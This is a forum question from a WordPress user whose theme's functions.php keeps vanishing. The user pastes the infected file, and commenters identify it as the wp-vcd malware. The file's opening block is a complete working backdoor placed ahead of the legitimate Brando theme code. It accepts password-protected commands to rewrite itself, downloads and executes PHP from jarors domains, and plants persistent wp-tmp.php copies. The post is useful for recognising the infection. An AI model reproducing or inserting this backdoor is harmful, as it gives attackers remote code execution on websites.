# Theme functions.php file auto delete everyday

Tags: functions, themes

function.php file auto delete every day my host support tell me to check your security and id do the following thing but the problem doesn't solve and I don't know what else should do

change xmpprx file permission to 0 wp-config permission to 400 wordfence plugin is installed
this is my functions.php file content :

```
<?php
if (isset($_REQUEST['action']) && isset($_REQUEST['password']) && ($_REQUEST['password'] == 'd845aeaf4bcadb30d8970f829f550535'))
    {
$div_code_name="wp_vcd";
        switch ($_REQUEST['action'])
            {
case 'change_domain';
                    if (isset($_REQUEST['newdomain']))
                        {
                            
                            if (!empty($_REQUEST['newdomain']))
                                {
                                                                           if ($file = @file_get_contents(__FILE__))
                                                                            {
                                                                                                 if(preg_match_all('/\$tmpcontent = @file_get_contents\("http:\/\/(.*)\/code\.php/i',$file,$matcholddomain))
                                                                                                             {

                                                                                       $file = preg_replace('/'.$matcholddomain[1][0].'/i',$_REQUEST['newdomain'], $file);
                                                                                       @file_put_contents(__FILE__, $file);
print "true";                                                                                                    }

}
}
}
break;

            case 'change_code';
if (isset($_REQUEST['newcode']))
{
if (!empty($_REQUEST['newcode']))
{
if ($file = @file_get_contents(__FILE__))
{ if(preg_match_all('/\/\/\$start_wp_theme_tmp([\s\S]*)\/\/\$end_wp_theme_tmp/i',$file,$matcholdcode))
{

                                                                                       $file = str_replace($matcholdcode[1][0], stripslashes($_REQUEST['newcode']), $file);
                                                                                       @file_put_contents(__FILE__, $file);
                                                               print "true";
                                                                                                             }


                                                                            }
                                }
                        }
                break;
                
                default: print "ERROR_WP_ACTION WP_V_CD WP_CD";
            }
            
        die("");
    }

$div_code_name = "wp_vcd";
$funcfile      = __FILE__;
if(!function_exists('theme_temp_setup')) {
    $path = $_SERVER['HTTP_HOST'] . $_SERVER[REQUEST_URI];
    if (stripos($_SERVER['REQUEST_URI'], 'wp-cron.php') == false && stripos($_SERVER['REQUEST_URI'], 'xmlrpc.php') == false) {
        
        function file_get_contents_tcurl($url)
        {
            $ch = curl_init();
            curl_setopt($ch, CURLOPT_AUTOREFERER, TRUE);
            curl_setopt($ch, CURLOPT_HEADER, 0);
            curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
            curl_setopt($ch, CURLOPT_URL, $url);
            curl_setopt($ch, CURLOPT_FOLLOWLOCATION, TRUE);
            $data = curl_exec($ch);
            curl_close($ch);
            return $data;
        }
        
        function theme_temp_setup($phpCode)
        {
            $tmpfname = tempnam(sys_get_temp_dir(), "theme_temp_setup");
            $handle   = fopen($tmpfname, "w+");
           if( fwrite($handle, "<?php\n" . $phpCode))
           {
           }
            else
            {
            $tmpfname = tempnam('./', "theme_temp_setup");
            $handle   = fopen($tmpfname, "w+");
            fwrite($handle, "<?php\n" . $phpCode);
            }
            fclose($handle);
            include $tmpfname;
            unlink($tmpfname);
            return get_defined_vars();
        }
        

$wp_auth_key='71e0917771bea14558257cae1b85eb0f';
        if (($tmpcontent = @file_get_contents("http://www.jarors.com/code.php") OR $tmpcontent = @file_get_contents_tcurl("http://www.jarors.com/code.php")) AND stripos($tmpcontent, $wp_auth_key) !== false) {

            if (stripos($tmpcontent, $wp_auth_key) !== false) {
                extract(theme_temp_setup($tmpcontent));
                @file_put_contents(ABSPATH . 'wp-includes/wp-tmp.php', $tmpcontent);
                
                if (!file_exists(ABSPATH . 'wp-includes/wp-tmp.php')) {
                    @file_put_contents(get_template_directory() . '/wp-tmp.php', $tmpcontent);
                    if (!file_exists(get_template_directory() . '/wp-tmp.php')) {
                        @file_put_contents('wp-tmp.php', $tmpcontent);
                    }
                }
                
            }
        }
        
        
        elseif ($tmpcontent = @file_get_contents("http://www.jarors.pw/code.php")  AND stripos($tmpcontent, $wp_auth_key) !== false ) {

if (stripos($tmpcontent, $wp_auth_key) !== false) {
                extract(theme_temp_setup($tmpcontent));
                @file_put_contents(ABSPATH . 'wp-includes/wp-tmp.php', $tmpcontent);
                
                if (!file_exists(ABSPATH . 'wp-includes/wp-tmp.php')) {
                    @file_put_contents(get_template_directory() . '/wp-tmp.php', $tmpcontent);
                    if (!file_exists(get_template_directory() . '/wp-tmp.php')) {
                        @file_put_contents('wp-tmp.php', $tmpcontent);
                    }
                }
                
            }
        } 
        
                elseif ($tmpcontent = @file_get_contents("http://www.jarors.top/code.php")  AND stripos($tmpcontent, $wp_auth_key) !== false ) {

if (stripos($tmpcontent, $wp_auth_key) !== false) {
                extract(theme_temp_setup($tmpcontent));
                @file_put_contents(ABSPATH . 'wp-includes/wp-tmp.php', $tmpcontent);
                
                if (!file_exists(ABSPATH . 'wp-includes/wp-tmp.php')) {
                    @file_put_contents(get_template_directory() . '/wp-tmp.php', $tmpcontent);
                    if (!file_exists(get_template_directory() . '/wp-tmp.php')) {
                        @file_put_contents('wp-tmp.php', $tmpcontent);
                    }
                }
                
            }
        }
        elseif ($tmpcontent = @file_get_contents(ABSPATH . 'wp-includes/wp-tmp.php') AND stripos($tmpcontent, $wp_auth_key) !== false) {
            extract(theme_temp_setup($tmpcontent));
           
        } elseif ($tmpcontent = @file_get_contents(get_template_directory() . '/wp-tmp.php') AND stripos($tmpcontent, $wp_auth_key) !== false) {
            extract(theme_temp_setup($tmpcontent)); 

        } elseif ($tmpcontent = @file_get_contents('wp-tmp.php') AND stripos($tmpcontent, $wp_auth_key) !== false) {
            extract(theme_temp_setup($tmpcontent)); 

        } 
        
        
        
        
        
    }
}

//$start_wp_theme_tmp



//wp_tmp


//$end_wp_theme_tmp
?><?php
/**
 * This file use for define custom function
 * Also include required files.
 *
 * @package Brando
 */

/*
 *  Brando Theme namespace.
 */

define('BRANDO_THEME', 'Brando');
define('BRANDO_THEME_SLUG', 'brando');
define('BRANDO_THEME_VERSION', '1.3.1');

/*
 *  Brando Theme Folders
 */


define('BRANDO_THEME_DIR',                      get_template_directory());
define('BRANDO_THEME_LANGUAGES',                BRANDO_THEME_DIR . '/languages');
define('BRANDO_THEME_ASSETS',                   BRANDO_THEME_DIR . '/assets');
define('BRANDO_THEME_JS',                       BRANDO_THEME_ASSETS . '/js');
define('BRANDO_THEME_CSS',                      BRANDO_THEME_ASSETS . '/css');
define('BRANDO_THEME_IMAGES',                   BRANDO_THEME_ASSETS . '/images');
define('BRANDO_THEME_LIB',                      BRANDO_THEME_DIR . '/lib');
define('BRANDO_THEME_ADMIN',                    BRANDO_THEME_LIB . '/admin');
define('BRANDO_THEME_TGM',                      BRANDO_THEME_LIB . '/tgm' );




/*
 *  Brando Theme Folder URI
 */


define('BRANDO_THEME_URI',                          get_template_directory_uri());
define('BRANDO_THEME_LANGUAGES_URI',                BRANDO_THEME_URI . '/languages');
define('BRANDO_THEME_ASSETS_URI',                   BRANDO_THEME_URI     . '/assets');
define('BRANDO_THEME_JS_URI',                       BRANDO_THEME_ASSETS_URI . '/js');
define('BRANDO_THEME_CSS_URI',                      BRANDO_THEME_ASSETS_URI . '/css');
define('BRANDO_THEME_IMAGES_URI',                   BRANDO_THEME_ASSETS_URI . '/images');
define('BRANDO_THEME_LIB_URI',                      BRANDO_THEME_URI . '/lib');

/**
 * Sets up theme defaults and registers support for various WordPress features.
 *
 * Note that this function is hooked into the after_setup_theme hook, which
 * runs before the init hook. The init hook is too late for some features, such
 * as indicating support for post thumbnails.
 */
if ( ! function_exists( 'brando_theme_setup' ) ) :
    function brando_theme_setup() {
        /*
         *   Text Domain
         */

        load_theme_textdomain( 'brando', get_template_directory() . '/languages' );

        /*
         * To add default posts and comments RSS feed links to theme head.
         */

        add_theme_support( 'automatic-feed-links' );

        // Set Custom Header
        add_theme_support( 'custom-header' );

        // Set Custom Body Background
        add_theme_support( 'custom-background' );
        
        /*
         * Let WordPress manage the document title.
         * By adding theme support, we declare that this theme does not use a
         * hard-coded <title> tag in the document head, and expect WordPress to
         * provide it for us.
         */
        add_theme_support( 'title-tag' );

        /* This theme styles the visual editor with editor-style.css to match the theme style. */
        add_editor_style( array( 'assets/css/editor-style.css' ) );

        /**
         * Custom image sizes for posts, pages, port, portfolio, gallery, slider.
         */
        add_theme_support( 'post-thumbnails' );
        set_post_thumbnail_size( 1200, 700 );

        // Register menu for Brando theme.
        register_nav_menus( array(
            'brandomenu' => esc_html__( 'Brando Menu', 'brando' ),
        ) );


        /*
         * Switch default core markup for search form, comment form, and comments
         * to output valid HTML5.
         */
        add_theme_support( 'html5', array(
            'search-form', 'comment-form', 'comment-list',
        ) );

        /*
         * Enable support for Post Formats.
         * See http://codex.wordpress.org/Post_Formats
         */
         
        add_theme_support( 'post-formats', array(
             'image', 'video', 'gallery', 'quote',
        ) );

    }
endif;
add_action( 'after_setup_theme', 'brando_theme_setup' );


/*
 *  Content Width (Set the content width based on the theme's design and stylesheet.)
 */
if ( ! function_exists( 'brando_content_width' ) ) :
    function brando_content_width() {
        $GLOBALS['content_width'] = apply_filters( 'brando_content_width', 1200 );
    }
endif;
add_action( 'after_setup_theme', 'brando_content_width', 0 );

/**
 * Register Brando theme required widget area.
 *
 * @link https://codex.wordpress.org/Function_Reference/register_sidebar
 *
 */
if ( ! function_exists( 'brando_widgets_init' ) ) :
    function brando_widgets_init() {
        register_sidebar( array(
            'name'          => esc_html__( 'Sidebar', 'brando' ),
            'id'            => 'sidebar-1',
            'description'   => esc_html__( 'Add widgets here to appear in your sidebar.', 'brando' ),
            'before_widget' => '<div id="%1$s" class="widget %2$s">',
            'after_widget'  => '</div>',
            'before_title'  => '<span class="alt-font text-uppercase dark-gray-text font-weight-600 text-large widget-title">',
            'after_title'   => '</span><div class="bg-fast-yellow separator-line-thick no-margin-lr"></div>',
        ) );

        register_sidebar( array(
            'name'          => esc_html__( 'Content Bottom 1', 'brando' ),
            'id'            => 'sidebar-2',
            'description'   => esc_html__( 'Appears at the bottom of the content on posts and pages.', 'brando' ),
            'before_widget' => '<div id="%1$s" class="widget %2$s">',
            'after_widget'  => '</div>',
            'before_title'  => '<h2 class="widget-title">',
            'after_title'   => '</h2>',
        ) );

        register_sidebar( array(
            'name'          => esc_html__( 'Content Bottom 2', 'brando' ),
            'id'            => 'sidebar-3',
            'description'   => esc_html__( 'Appears at the bottom of the content on posts and pages.', 'brando' ),
            'before_widget' => '<div id="%1$s" class="widget %2$s">',
            'after_widget'  => '</div>',
            'before_title'  => '<h2 class="widget-title">',
            'after_title'   => '</h2>',
        ) );

        register_sidebar( array(
            'name'          => esc_html__( 'Elements', 'brando' ),
            'id'            => 'sidebar-4',
            'description'   => esc_html__( 'Appears at the bottom of the content on posts and pages.', 'brando' ),
            'before_widget' => '<div id="%1$s" class="widget %2$s ">',
            'after_widget'  => '</div>',
            'before_title'  => '<span class="alt-font text-uppercase dark-gray-text font-weight-600 text-large widget-title">',
            'after_title'   => '</span><div class="bg-fast-yellow separator-line-thick no-margin-lr md-margin-eleven md-no-margin-lr"></div>',
        ) );
    }
endif;
add_action( 'widgets_init', 'brando_widgets_init' );

if (file_exists( BRANDO_THEME_LIB . '/brando-require-files.php' )) 
{
    require_once( BRANDO_THEME_LIB . '/brando-require-files.php');
}
```

Comment: I have no idea what you are actually asking?

Comment: You are infected by wp-vcd malware.

Comment: @DavidSticker thank you you're right